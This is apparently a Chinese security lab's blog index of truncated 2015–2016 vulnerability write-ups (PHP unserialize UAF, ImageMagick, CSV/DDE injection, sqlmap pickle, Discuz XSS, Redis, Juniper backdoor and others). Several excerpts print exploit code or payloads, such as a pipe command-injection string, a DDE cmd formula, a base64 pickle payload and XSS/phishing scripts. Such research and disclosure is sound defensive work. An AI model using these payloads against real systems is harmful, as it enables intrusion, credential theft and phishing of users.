Author: hei@knownsec.comDate: 2016-07-06该内容由 heige 2016年6月23日于 《中国网络安全大会 2016》演讲内容整理。PDF 下载：非主流Fuzzing.pdf 什么是FuzzingFuzzing是⼀种常⽤漏洞挖掘的⽅法。“通过向应⽤程序提供⾮预期的输⼊并监控输出中的异常来发现软件中的故障(faults)的⽅法”“模糊测试利⽤⾃动化或半⾃动化的⽅法重复地向有⽤程序输⼊” Fuzzing的结构及流程            1、构造⾮预期的输⼊构造⾮预期的输⼊（⽣成模糊测试的数据）是找到漏洞的关键，也是Fuzzing框架设计的⼀个关键点。数据的构造⼀般包括：基本数据（结构）模板及对应值：基本数据模板：如⽂件格式(pdf、doc、html等)、⽹络协议、语⾔的语法等对应值：包括规定格式的属性及常见的引起异常的数据值或者正常值（如：随机超长字符串等）需要前期分析总结准备，⾃动化随机构造数据样本2、应⽤程序解析执⾏把“构造⾮预期的输⼊”提交给应⽤程序执⾏。需要⾃动化、持续不间断的执⾏。如：应⽤程序出现崩溃后能重新启动并执⾏。这是Fuzzing框架稳定性最关键的步骤，这个点如果中断整个Fuzzing流程就 ...继续阅读 (24)

Author: niubl (知道创宇403)Date: 2016-01-07之前在Sebug沙龙分享的PHP 5.4.34 unserialize UAF exploit，EXP放到博客来，还有那天的PPT：PHP反序列化UAF漏洞的研究与Exp编写EXP代码：''' php 5.4.34 cve-2014-8142 php server script content for this vulnerability: <?php $data = base64_decode($_GET['data']); echo serialize(unserialize($data)); ?> ''' import re import pdb import sys import urllib import urllib2 import base64 import struct import urlparse if __name__ == '__main__': if len(sys.argv) == 5: target = urlparse.urlunsplit(('http', sys.argv[1], sys.argv[2], '', '')) else: print "Usage: python " + sys.argv[ ...继续阅读 (25)

Author: RickGray (知道创宇404安全实验室)Date: 2016-06-01好像很久没发文了，近日心血来潮准备谈谈 “漏洞检测的那些事儿”。现在有一个现象就是一旦有危害较高的漏洞的验证 PoC 或者利用 EXP 被公布出来，就会有一大群饥渴难忍的帽子们去刷洞，对于一个路人甲的我来说，看得有点眼红。XD刷洞归刷洞，蛋还是要扯的。漏洞从披露到研究员分析验证，再到 PoC 编写，进而到大规模扫描检测，在这环环相扣的漏洞应急生命周期中，我认为最关键的部分应该算是PoC编写和漏洞检测这两个部分了：PoC编写- 复现漏洞环境，将漏洞复现流程代码化的过程漏洞检测- 使用编写好的 PoC 去验证测试目标是否存在着漏洞，需要注意的是在这个过程（或者说是在编写 PoC 的时候）需要做到安全、有效和无害，尽可能或者避免扫描过程对目标主机产生不可恢复的影响首先来说说PoC 编写。编写 PoC 在我看来是安全研究员或者漏洞分析者日常最基础的工作，编写者把漏洞验证分析的过程通过代码描述下来，根据不同类型的漏洞编写相应的 PoC。根据常年编写 PoC 积累下来的经验，个人认为在编写 PoC 时应遵循几个准侧，如下：随机性确定性通用型可能你会觉得我太学术了？那么我就一点一点地把他们讲清楚。PoC 编写准则 & 示例i. 随机性PoC 中所涉及的关键变量或数据应该具有随机性，切勿使用固定的 ...继续阅读 (32)

Author: niubl（知道创宇404安全实验室）Date: 2016-05-07一、漏洞概要i. 漏洞描述ImageMagick是一款使用量很广的图片处理程序，很多厂商都调用了这个程序进行图片处理，包括图片的伸缩、切割、水印、格式转换等等。我发现当用户传入一个包含|竖线的文件名的时候，就有可能触发命令注入漏洞。ii. 漏洞影响测试：ImageMagick-7.0.1-2.tar.bz2iii. 漏洞分析ImageMagick在处理文件名时会调用OpenBlob()函数，在OpenBlob()函数中，代码2484行，判断文件名是否以|竖线开头，如果是，那么他会调用popoen_utf8()函数处理文件名，代码如图：来到popoen_utf8()函数，popen_utf8()函数调用会调用popen()函数打开文件，这样就导致我们可以注入系统命令，代码如图：iv. 漏洞利用（PHP）在PHP禁用执行系统命令函数的时候，我们可以用他来绕过disable_funtion，PHP编写如下代码：<?php new Imagick('|touch /tmp/niubl'); ?>使用PHP执行，结果如图：二、漏洞时间线2016.05.07    知道创宇404安全实验室niubl发现该漏洞2016.05.29    国外研究者报告并公布了漏洞细节 http://permalin ...继续阅读 (29)

Author: Evi1m0 (知道创宇404安全实验室)Date: 2016-05-170x01 概述现在很多应用提供了导出电子表格的功能（不限于 Web 应用），早在 2014 年 8月 29 日国外 James Kettle 便发表了《Comma Separated Vulnerabilities》文章来讲述导出表格的功能可能会导致注入命令的风险，因为导出的表格数据有很多是来自于用户控制的，如：投票应用、邮箱导出。攻击方式类似于 XSS ：所有的输入都是不可信的。0x02 公式注入 & DDE我们知道在 Excel 中是可以运行计算公式的：=1+5，它会将以 = 开头的单元格内容解释成公式并运行，单纯的运行计算公式可能没什么用，但这里可以用到 DDE 。Dynamic Data Exchange（DDE）是一款来自微软的古老技术，它是 Windows 下的一种跨进程通信的协议，支持 Microsoft Excel， LibreOffice 和 Apache OpenOffice。执行 cmd 弹出计算器：=cmd|' /C calc'!A0当然也可以使用 -cmd ，+cmd 来执行 DDE ，这个问题在2014年进行了修复（CVE-2014-3524），所以我们现在注入命令执行时软件会有如下的提示：这也就是现在这个漏洞类型的特殊性，虽然软件有着这样的安全风险提醒但仍 ...继续阅读 (18)

作者：Evi1m0 # 知道创宇404安全实验室时间：2016-04-280x01 JSONView 介绍Github:https://github.com/gildas-lormeau/JSONView-for-ChromeChromeStore:https://chrome.google.com/w.....bnpoihckbnefhakgolnmc?hl=en-USJSONView 插件是目前最热门的一款开发者工具插件，它是查看json数据的神器。通常来讲，json 数据一般没有经过格式化或经过了 unicode 编码，没有缩进，没有换行等，给开发者阅读造成了一定困难。而jsonview 插件可以自动对 json 数据转码，缩进，格式化，直接显示出格式化后的数据，使得开发人员可以更好的阅读信息，本文中出现问题的版本为 Chrome 浏览器下的 JSONView 插件，Firefox 下版本不受影响。0x02 正确的处理方式我们知道开发人员在使用 JSONP callback 的方式进行跨域请求时，通常会为了方便前端调用 callback 名是可自定义的，例如 function?callback=jQuery14114 ，这时页面将会输出 callback 的参数值到页面中，所以出现了很多 callback 导致的跨站漏洞，解决方案大多由过滤 URL 特殊字符、严格定义 Res ...继续阅读 (34)

Author: Evi1m0 (知道创宇404安全实验室)Date: 2016-04-21I.今天睡醒后我想到之前的“漏洞”好像可以利用特性让它变成真的漏洞，简单说下功能点。在测试越权操作的过程中，我发现未登录的情况下访问创建主题的 URL 站点会进行跳转，为了看清源码使用 View-Source ，这里发现可控点为 c 参数。view-source:masaike/ThemeCreator/index.aspx?c=QAQ\)QAQ\(QAQ<script type="text/javascript"> window.open('/login.aspx?burl=http%3a%2f%2fmasaike%2fThemeCreator%2findex.aspx%3fc%3dQAQ)QAQ(QAQ','_top'); </script>对特殊字符进行测试（ "> , < | () : ' " \ % ; & 空格 ..." ）后发现仅允许使用 " . ' () " 这4个特殊字符，由于我们得知单引号可以使用，所以思考这里直接闭合 "window.open('/url?QAQ')" 参数然后注入恶意代码便完成了这次攻击，但由于 JS 的 解析错误处理顺序如果不闭合前面语句及注释后面语句是无法执行我们注入的恶意代码的。例如：window.ope ...继续阅读 (41)

Author: RickGray (知道创宇404安全实验室)Date: 2016-04-08分布式应用中消息队列使用特别广泛，而针对分布式集群的攻击常常是点到面的扩散，突破关键点从而控制整个集群。在使用消息队列传递消息时，不安全的数据序列化方式便为整体系统埋下了一颗定时炸弹，一旦消息代理中间件被攻破就会导致整个工作节点沦陷。（本文只对可行思路进行阐述，如有不恰当之处，还望指出）一、消息队列与数据序列化1. 消息队列代理在一个分布式系统中，消息队列（MQ）是必不可少的，任务下发到消息队列代理中，工作节点从队列中取出相应的任务进行处理，以图的形式展现出来是这个样子的：任务通过 Master 下发到消息队列代理中，Workers 从队列中取出任务然后进行解析和处理，按照配置对执行结果进行返回。下面以 Python 中的分布式任务调度框架Celery来进行代码说明，其中使用了 Redis 作为消息队列代理：from celery import Celery app = Celery('demo', broker='redis://:@192.168.199.149:6379/0', backend='redis://:@192.168.199.149:6379/0') @app.task def add(x, y): return x + y在本地起一个 Worker 用以执行注册好的 ...继续阅读 (28)

Author: RickGray (知道创宇404安全实验室)Date: 2016-03-09近日回顾了 PyCon 2015 上@Tom Eastman所讲的关于 Python 序列化格式的安全议题 -《Serialization formats are not toys》。议题主要介绍了 YAML、XML 和 JSON 三种格式用于 Python 序列化数据处理所存在的一些安全问题，其中 XML 部分讲解的是 Python 中的 XXE，而 Python 处理 JSON 数据本身不存在问题，但在前端 JavaScript 对返回 JSON 进行处理时常常直接使用eval()来转换类型从而留下安全隐患。关于 XML 和 JSON 格式相关的安全问题本文就不多提了，本文仅记录下议题中所提到的 Python PyYAML 模块在处理 YAML 格式数据时所存在的问题。一、Python 中处理 YAML 格式数据YAML 在数据序列化和配置文件中使用比较广泛，在 Ruby On Rails 中就使用 YAML 作为配置文件。最新的 YAML 标准版本为 1.2，而目前大多数语言对 YAML 解析实现都为 1.1 甚至 1.0 版本，各版本标准可通过官方yaml.org进行查阅。一个简单的 YAML 数据为：--- date: !!str 2016-03-09 weekday: Wedn ...继续阅读 (39)

Author: rungobier (知道创宇404实验室)Date: 2016-03-04一、简介前几天看到github上的ysoserial更新至0.0.4，增加了CommonsBeanUtils的Java反序列化Payload生成代码，原以为跟前面的CommonsCollections的原理一样，仔细看了一遍思路大不相同。CommonsBeanutilsCollectionsLogging1主要依赖的jar包有：commons-collections(2.0-3.2.2), commons-beanutils-1.9.2, commons-loggings-1.2。二、序列化CommonsBeanutilsCollectionsLogging1的主要代码如下:public Object getObject(final String command) throws Exception { final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); // mock method name until armed final BeanComparator comparator = new BeanComparator("lowestSetBit"); // create queue w ...继续阅读 (32)

注：PDF报告原文下载链接Author: hei@knownsec.comDate: 2016-02-29一、漏洞描述在安卓平台上的微信及QQ自带浏览器均使用的QQ浏览器X5内核，在处理ip及域名hostnames存在逻辑缺陷，从而绕过浏览器策略导致UXSS漏洞。二、PoC代码及简单分析PoC.htm的代码如下：<iframe src=‘http://1.1.1.1..qq.com'><iframe>当安卓手机用户使用微信或QQ访问POC.htm时，真实请求并解析执行的是http://1.1.1.1/..qq.com/页面代码如下：<script> alert('document.domain:'+document.domain); document.domain ='qq.com'; alert(document.domain); </script>也就是说当遇到 ip地址+“.”+根域的URL自动根据IP地址结构分割URL并访问该IP地址，而浏览器解析的JavaScript代码则按当前的document.URL来处理，会认为当前的document.domain为根域的子域。三、漏洞演示测试POC.htm 微信、QQ扫描或者点击访问URL注：微信版本号为 6.3.8QQ版本号为 v6.1.0.2635四、漏洞利用思路通过设置d ...继续阅读 (18)

Author: 知道创宇404安全实验室1. 更新情况2016-02-17 下午    第一版完成2016-02-18 上午    第二版完成2016-02-22 下午    第三版完成2. 漏洞概要Glibc是GNU发布的LIBC库的C运行库，Glibc是Linux系统中最底层的API，基本其它任何运行库都会依赖于Glibc。Glibc除了封装Linux操作系统所提供的系统服务外，还提供了其它的必要服务的实现。由于Glibc几乎包含所有的UNIX通行的标准，可以说是操作系统重要支撑库。Glibc中的DNS解析器中存在基于栈的缓冲区溢出漏洞，当在程序中调用Getaddrinfo函数时，攻击者自定义域名或是通过中间人攻击利用该漏洞控制用户系统。比如攻击者向用户发送带有指向恶意域名的链接的邮件，一旦用户点击该链接，攻击者构造合法的DNS请求时、以过大的DNS数据回应便会形成堆栈缓存区溢出并执行远程代码，达到完全控制用户操作系统。该漏洞影响Glibc 2.9以后的所有版本，虽然可以进行远程执行攻击，攻击者还需要解决绕过ASLR系统安全机制。3. 漏洞复现Google提供的POC由两部分组成：执行CVE-2015-7547-POC.py作为一个伪造的DNS服务器，会向DNS客户端发送构造的验证数据，包含超长字符串。执行编译好的CVE-2015-7547-CLIENT.c作为客户端，向此DN ...继续阅读 (17)

Author: Evi1m0 (404安全实验室)Date: 2016-02-26本篇文章记录 2015年初时利用微信网页版红包 H5 接口实现的通用型平台抢红包神器，不同于目前市面上的抢红包外挂（模拟点击、HookAPI等）方式，当然该漏洞在15年3月便已经修复。WebAPI我们在使用网页版微信时无法点击领取红包，但是通过控制台查看网络包发现红包地址在 Response 中：https://wxapp.tenpay.com/app/v1.0/receive.cgi?showwxpaytitle=1&sendid=1000033901********10153974107&channelid=1&msgtype=1&ver=2&sign=aefc0f0fadb6f09993fb071bf3****************9b4d8020f07c351c4bb6489d60d65f7f9fb2622f977fa613cbe443f6c7279f03fff2aff18859674c978656ed45388e3f606eae42a0f8ef9014f1***********21e055163c935当群组或者用户给我们发红包时可以在返回内容中可以看到红包的 URL 地址（手机端老版本的微信是使用 H5 的接口领取红包，而无法自动判断用户发来的消息 ...继续阅读 (19)

Author: RickGray (404安全实验室)Date: 2016-02-16本文源于老外@nvisium在其博客发表的博文《Injecting Flask》，在原文中作者讲解了 Python 模板引擎Jinja2在服务端模板注入 (SSTI) 中的具体利用方法，在能够控制模板内容时利用环境变量中已注册的用户自定义函数进行恶意调用或利用渲染进行 XSS 等。对于 Jinja2 模板引擎是否能够在 SSTI 的情况下直接执行命令原文并没有做出说明，并且在 Jinja2 官方文档中也有说明，模板中并不能够直接执行任意 Python 代码，这样看来在 Jinja2 中直接控制模板内容来执行 Python 代码或者命令似乎不太可能。一、模板中复杂的代码执行方式最近在进行项目开发时无意中注意到 Jinja2 模板中可以访问一些 Python 内置变量，如 "[]" "{}" 等，并且能够使用 Python 变量类型中的一些函数，示例代码一如下：# coding: utf-8 import sys from jinja2 import Template template = Template("Your input: {}".format(sys.argv[1] if len(sys.argv) > 1 else '<empty>')) print template ...继续阅读 (20)

Author：知道创宇404安全实验室一、前言关于VxWorks，这里引用44CON议题《攻击 VxWorks：从石器时代到星际》探究 一文章中的介绍：VxWorks 是世界上使用最广泛的一种在嵌入式系统中部署的实时操作系统，是由美国WindRiver公司（简称风河公司，即WRS 公司）于1983年设计开发的。其市场范围跨越所有的安全关键领域，仅举几例，包括火星好奇心流浪者、波音787梦幻客机、网络路由器。这些应用程序的安全高危性质使得VxWorks的安全被高度关注。VxWorks操作系统是由美国Wind River(风河公司)开发的一种嵌入式实时操作系统（RTOS），已宣称拥有至少15亿台设备，VxWorks支持几乎所有现代市场上的嵌入式CPU架构，包括x86系列、MIPS、 PowerPC、Freescale ColdFire、Intel i960、SPARC、SH-4、ARM, StrongARM以及xScale CPU。在2015年9月9日-11日举办的44CON伦敦峰会中，Yannick Formaggio介绍了他对VxWorks进行深入安全研究的方法，他采用了Fuzzing框架Sulley对VxWorks系统的多个协议进行了Fuzzing，挖掘到一些漏洞，并结合VxWorks的WDB RPC实现了一个远程调试器，进行了相关调试分析。其中很多实现及漏洞细节没有公开，我们搭 ...继续阅读 (94)

Author: xiaohu & mt (知道创宇404安全实验室)Date: 2015-12-23Juniper 网络公司（瞻博网络）作为全球领先的联网和安全性解决方案供应商，Juniper 网络公司对依赖网络获得战略性收益的客户一直给予密切关注。公司的客户来自全球各行各业，包括主要的网络运营商、企业、政府机构以及研究和教育机构等。Juniper 网络公司推出的一系列联网解决方案，提供所需的安全性和性能来支持全球最大型、最复杂、要求最严格的关键网络。Juniper 网络公司在上周发表声明，称 NetScreen 与 Juniper SSG 防火墙产品使用的操作系统 Juniper ScreenOS 中发现两个高危漏洞：CVE-2015-7755 和 CVE-2015-7756。前者描述的是 Juniper ScreenOS 中的一个身份认证绕过漏洞，而后者涉及设备 VPN 加密伪随机密钥可被破解的漏洞。一、CVE-2015-7755 分析通过对 Juniper　ScreenOS 固件分析，发现通过 SSH 或 TELNET 登录 ScreenOS 设备，登录认证前 ScreenOS 会对授权认证包中信息做匹配，后门密码是硬编码编写在固件代码中，经过深入分析还发现登录设备授权证包中的用户名可以随意指定，只需要登录授权认证中包中密码指定为后门密码为<<< % ...继续阅读 (24)

Author: Nixawk (知道创宇404安全实验室)Date: 2015-12-09一、漏洞概述于2015年01月27日， 我在阅读最新版本Sqlmap代码时，发现其存在代码执行问题。安全问题由python的pickle导致。pickle 模块实现了一个基础而强劲的算法，用于序列化和反序列化Python对象结构，常用于跨平台及网络应用。在进行反序列化操作时，pickle会执行精心构造的python代码。二、漏洞演示1.代码执行测试数据：python sqlmap.py --pickled-options "Y29zCnN5c3RlbQooUydkaXInCnRSLg=="测试结果：2.代码分析存在代码执行问题的代码文件如下：以/path/to/sqlmap/lib/core/convert.py文件中的base64unpickle函数为例，进行说明。经过分析，我们可以清晰了解，恶意数据可通过参数 --pickled-options 传入 Sqlmap，流程如下：恶意数据通过参数--pickled-options传入base64unpickle，函数解码数据时， 执行Python代码。59 def base64unpickle(value): 60 """ 61 Decodes value from Base64 to plain format and deserializ ...继续阅读 (45)

Author:RickGray (知道创宇404安全实验室)Date: 2015-12-09之前（2015-03-07）乌云上报了《Discuz全版本存储型DOM XSS（可打管理员）附Discuz官方开发4大坑&验证脚本》，但是在 Discuz版本（2015-06-09）的修复中却因为修复不全导致漏洞仍然可以触发。一、原理分析Discuz 在用户评论处设置了帖子管理员编辑评论的功能，由于前端 JS 代码处理不当导致了经过恶意构造的评论内容在经过交互后形成 XSS 。下面通过 payload 的调试过程来解释该漏洞的形成过程。首先，在评论处提交评论内容：[email=2"onmouseover="alert(2)]2[/email]由于服务器对引号等有过滤，所以提交后，查看源码会发现引号已经被实体编码了。对于普通用户提交的评论，管理员或者版主都有权利对其发表的评论进行管理。当管理或版主对用户的评论点击管理时，前端 JS 代码就开始处理，弹出一个编辑框供管理或版主操作。在 JS 代码处理的过程中，首先获取用户评论的内容，代码位于当前页面中：而$()函数原型位于 /static/js/common.js 中：使用了原生的document.getElementById()函数来获取页面中的对应对象，此处获取的是标有id=”e_textarea”的对象，其对应的值为用户评论的内容。 ...继续阅读 (28)

Author: RickGrayDate: 2015-11-25一、什么是序列化序列化常用于将程序运行时的对象状态以二进制的形式存储于文件系统中，然后可以在另一个程序中对序列化后的对象状态数据进行反序列化恢复对象。简单的说就是可以基于序列化数据实时在两个程序中传递程序对象。1. Java 序列化示例上面是一段简单的 Java 反序列化应用的示例。在第一段代码里面，程序将实例对象String("This is String object!")通过 ObjectOutputStream 类的writeObject()函数写到了文件里。序列化对象在具有一定的二进制结构，以十六进制格式查看存储了序列化对象的文件，除了包含一些字符串常量以外，还能看到其具有不可打印的字符在里面，而这些字符就是用来描述其序列化结构的。（关于序列化格式的相关信息可以参考官方文档）2. Java 序列化特征在序列化对象数据中，头4个字节存储的是 Java 序列化对象数据特有的 Magic Number 和相应的协议版本，通常为：0xaced (Magic Number) 0x0005 (Version Number)在具体序列化一个对象时，会遵循序列化协议进行数据封装。扯得有点远了，对 Java 序列化对象数据结构的研究不在本文范围内，官方文档有较为详细的说明，有需要的可以自行查阅。这里我们只需要知道，序列化后的 ...继续阅读 (56)

Author: evi1m0 (知道创宇404安全实验室)Date : 2015-11-26近日 Django 官方发布《Security releases issued: 1.9rc2, 1.8.7, 1.7.11》安全公告，修复一个模板层 date 过滤器可能导致 Settings 信息泄露漏洞，从公告中我们可以看到的细节如下：If an application allows users to specify an unvalidated format for dates and passes this format to the date filter, e.g. {{ lastupdated|date:userdateformat }}, then a malicious user could obtain any secret in the application's settings by specifying a settings key instead of a date format. e.g. "SECRETKEY" instead of "j/m/Y".如果一个应用程序中允许用户控制模板层的 date 过滤器格式，例如 {{ lastupdated | date:userdateformat }} ，那么用户就可以通过指定一个非规范的日期格式来获取配置文件中的 ...继续阅读 (24)

Date: 2015-11-11Redis 未授权访问的问题是一直存在的问题，知道创宇安全研究团队历史上也做过相关的应急，今日，又出现 Redis 未授权访问配合 SSH key 文件被利用的情况，今天我们来简要的分析下。一、漏洞概述Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。1、漏洞描述Redis 安全模型的观念是: “请不要将 Redis 暴露在公开网络中, 因为让不受信任的客户接触到 Redis 是非常危险的” 。Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99% 使用 Redis 的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。因为其他受信任用户需要使用 Redis 或者因为运维人员的疏忽等原因，部分 Redis 绑定在 0.0.0.0:6379，并且没有开启认证（这是Redis 的默认配置），如果没有进行 ...继续阅读 (31)

09 Oct 2015 - evi1m0@knownsecWebkitdirectory早在 12 年 Alan Layt 便写了这篇关于 HTML5 中上传文件夹新特性的文章（http://sapphion.com/2011/11/21/html5-folder-upload-with-webkitdirectory/），之后阿里做了个简单的 Demo 页面来说明这个特性配合 ClickJacking 是可以达到某种钓鱼效果的（https://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.IYip0H&id=3），基于前面两篇文章这里做了简单的 Demo 分享一下。Phishing在支持 HTML5 的浏览其中嵌入：<input type="file" name="test" id="file-upload" multiple webkitdirectory="">此时文件夹变得可选择，攻击者可以实现使用 webkitdirectory 特性诱导用户点击下载选择文件夹，其背后实现的是将文件夹上传到服务端，之后我写了一个简单的 Demo 来进行测试，流程大致为：编写前端钓鱼下载页面诱导用户点击选择文件夹过滤出用户文件夹的指定文件将符合条件的文件上传至远程服务器这里对目标文件夹内的文件格式进行过滤，防止在容量过大的情 ...继续阅读 (47)

Author: RickGray (知道创宇404安全实验室)Date: 2015-11-06近日，vBulletin 的一枚 RCE 利用和简要的分析被曝光，产生漏洞的原因源于 vBulletin 程序在处理 Ajax API 调用的时候，使用unserialize()对传递的参数值进行了反序列化操作，导致攻击者使用精心构造出的 Payload 直接导致代码执行。关于 PHP 中反序列化漏洞的问题可以参考 OWASP 的《PHP Object Injection》。使用原文提供的 Payload 可以直接在受影响的站点上执行phpinfo(1)：具体 Payload 的构造过程也文中有所提及，但是笔者在对 vBulletin 5.1.x 版本进行测试的时候，发现原本的 Payload 并不能成功，甚是疑惑。然而在深入分析后，发现在具体利用的时候还需要结合 vBulletin 程序本身的一些代码结构才能得到一个较为通用的 Payload，通过下面的分析后就能够明白。一、反序列化触发点跟踪虽然此次漏洞unserialize()函数的触发在曝光的文章中已经描述的很清楚了，并且对整个关键代码的触发流程也进行了说明，但是在深入跟踪和分析时，觉得还是有值得注意和学习的地方。http://172.16.96.130/ajax/api/hook/decodeArguments?arguments ...继续阅读 (33)

Author: RickGray (知道创宇404安全实验室)在今年的黑帽大会上James Kettle讲解了《Server-Side Template Injection: RCE for the modern webapp》，从服务端模板注入的形成到检测，再到验证和利用都进行了详细的介绍。本文在理解原文内容的基础上，结合更为具体的示例对服务端模板注入的原理和扫描检测方法做一个浅析。一、模板注入与常见Web注入就注入类型的漏洞来说，常见 Web 注入有：SQL 注入，XSS 注入，XPATH 注入，XML 注入，代码注入，命令注入等等。注入漏洞的实质是服务端接受了用户的输入，未过滤或过滤不严谨执行了拼接了用户输入的代码，因此造成了各类注入。下面这段代码足以说明这一点：// SQL 注入 $query = "select * from sometable where id=".$_GET['id']; mysql_query($query); ------------- 华丽的分割线 ------------- // 模版注入 $temp->render("Hello ".$_GET['username']);而服务端模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，在进行目标编译渲染的过程中，执行了用户插入的恶意内容 ...继续阅读 (34)

Author: Evi1m0#KnownSec 中午朋友发来一个帖子询问我《朋友 6S 被偷了，小偷（可能是团伙）发来链接偷取 APPLE ID》是什么原理，之后和 RickGay 看了下是利用腾讯企业邮箱的 POST XSS 进行的盗取登录操作，从而登录受害者邮箱获取 APPLE ID。（目前腾讯已经修复此漏洞） Target: http://eeee.washbowl.com.cn/View-Source:源码写入两个 iframe ，恶意代码在 /htmlpage5.html 中：<html> <head> <meta charset="utf-8" /> <title>qqjs4</title> </head> <body> <script> function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com ...继续阅读 (20)

Author: RickGray (知道创宇404安全实验室)Date: 2015-10-23昨日(2015-10-22)，Joomla CMS发布新版本3.4.5，该版本修复了一个高危的SQL注入漏洞，3.2至3.4.4版本都受到影响。攻击者通过该漏洞可以直接获取获取数据库中敏感信息，甚至可以获取已登陆的管理员会话直接进入网站后台。一、原理分析在 Joomla CMS 中有一个查看历史编辑版本的组件(com_contenthistory)，该功能本应只有管理员才能访问，但是由于开发人员的疏忽，导致该功能的访问并不需要相应的权限。通过访问/index.php?option=com_contenthistory可以使得服务端加载历史版本处理组件。程序流程会转到/components/com_contenthistory/contenthistory.php文件中：<?php defined('_JEXEC') or die; $lang = JFactory::getLanguage(); $lang->load('com_contenthistory', JPATH_ADMINISTRATOR, null, false, true) || $lang->load('com_contenthistory', JPATH_SITE, null, false, ...继续阅读 (13)

Author: RickGray (知道创宇404安全实验室)Date: 2015-10-09xmlrpc 是 WordPress 中进行远程调用的接口，而使用 xmlrpc 调用接口进行账号爆破在很早之前就被提出并加以利用。近日SUCURI发布文章介绍了如何利用 xmlrpc 调用接口中的system.multicall来提高爆破效率，使得成千上万次的帐号密码组合尝试能在一次请求完成，极大的压缩请求次数，在一定程度上能够躲避日志的检测。一、原理分析WordPress 中关于 xmlrpc 服务的定义代码主要位于 wp-includes/class-IXR.php 和 wp-includes/class-wp-xmlrpc-server.php 中。基类 IXR_Server 中定义了三个内置的调用方法，分别为 system.getCapabilities，system.listMethods 和 system.multicall，其调用映射位于 IXR_Server 基类定义中：function setCallbacks() { $this->callbacks['system.getCapabilities'] = 'this:getCapabilities'; $this->callbacks['system.listMethods'] = 'th ...继续阅读 (37)

1. 漏洞描述Linux 在打开显卡设备使用ioctl()函数控制显卡时会调用DRM驱动程序，其中在调用drm_legacy_lock_free()函数时，获取lock指针的值赋值给old变量时，未考虑lock值可能会存在0值，导致空指针引用bug。2. 漏洞影响Linux kernel 4.2（Arch测试）Linux kernel 3.19.0-28 （Ubuntu测试）3. 漏洞分析该bug使用Trinity fuzz发现，Trinity是一款Linux 系统调用fuzz工具，用来测试Linux系统调用，运行Trinity：./trinity -X -C 16Trinity X参数意图使root权限运行Trinity时切换到nogroup低权限运行Trinity进程，可是当我这样运行Trinity发现bug时，在POC重现时发现只能以root权限触发，原因以后分析。运行Trinity可能会导致系统崩溃，也正是我们发现bug的最好时机，系统崩溃后如何发现崩溃原因是我们关注的，这里采用Ubuntu下的linux-crashdump软件，保存系统崩溃现场。sudo apt-get install linux-crashdump系统崩溃后会自动生成dump，保存在/var/crash目录，并重启系统，现在使用crash工具分析dump，在使用crash分析dump时需要系统的调试符号 ...继续阅读 (41)

By: RickGray (知道创宇404安全实验室)近日，WordPress 发布了新版本4.3.1，其中修复了几个严重的安全问题，其中包含了由Check Point所提交的一个跨站脚本漏洞（CVE-2015-5714）和一个权限提升漏洞（CVE-2015-5715）。8月初，Check Point 在其官方博客上发表了一篇关于《WordPress漏洞三部曲》系列文章的第一部，在这篇文章中，提及了 WordPress 在 4.2.3 版本中修复的一个越权漏洞，这里对此就不再做具体分析和说明，相关细节详情可参考原文和 phithon 所写的《Wordpress4.2.3提权与SQL注入漏洞(CVE-2015-5623)分析》。这里主要说明的是 "三部曲" 中的第三部，也就是 Check Point 在其博客上公开的关于 WordPress 4.3.1 版本中所修复的另一个越权漏洞和一个跨站脚本漏洞（原文在这里）。1. "KSES"与简码过滤差异化导致的 XSS首先来看看跨站脚本漏洞。WordPress 在编辑文章内容时允许使用简码（shorcodes）来表示资源（图片，链接等）。WordPress 中开启了白名单机制去过滤 HTML 标签，只有在白名单规则里的标签，才允许被使用，并且会使用专用脚本 "KSES" 去检测和过滤这些 HTML 标签。这里需要说明的是，WordPress ...继续阅读 (30)

Security releases issued: 1.8.4, 1.7.10, 1.4.22CVE: 2015-5963Fix: Update/1.8.4/1.7.10/1.4.22/Add @login_required()Django 官方在八月十八号发布多个版本更新，修复几个安全问题，其中便包括一个由编码不当导致的 DoS 漏洞，测试一些网站均存在此问题。Detaildjango.contrib.auth.views.logout视图用于开发者实现用户注销退出功能，正常情况下对于 logout 视图应使用官方提供的django.contrib.auth.decorators.login_required修饰器方法来判断用户是否已经登录。由于不少开发人员忽略使用修饰器进行判断，导致攻击者可以匿名访问视图，不断创建会话阻塞导致拒绝服务攻击。django/contrib/sessions/middleware.py:try: accessed = request.session.accessed modified = request.session.modified except AttributeError: pass else: if accessed: patch_var ...继续阅读 (30)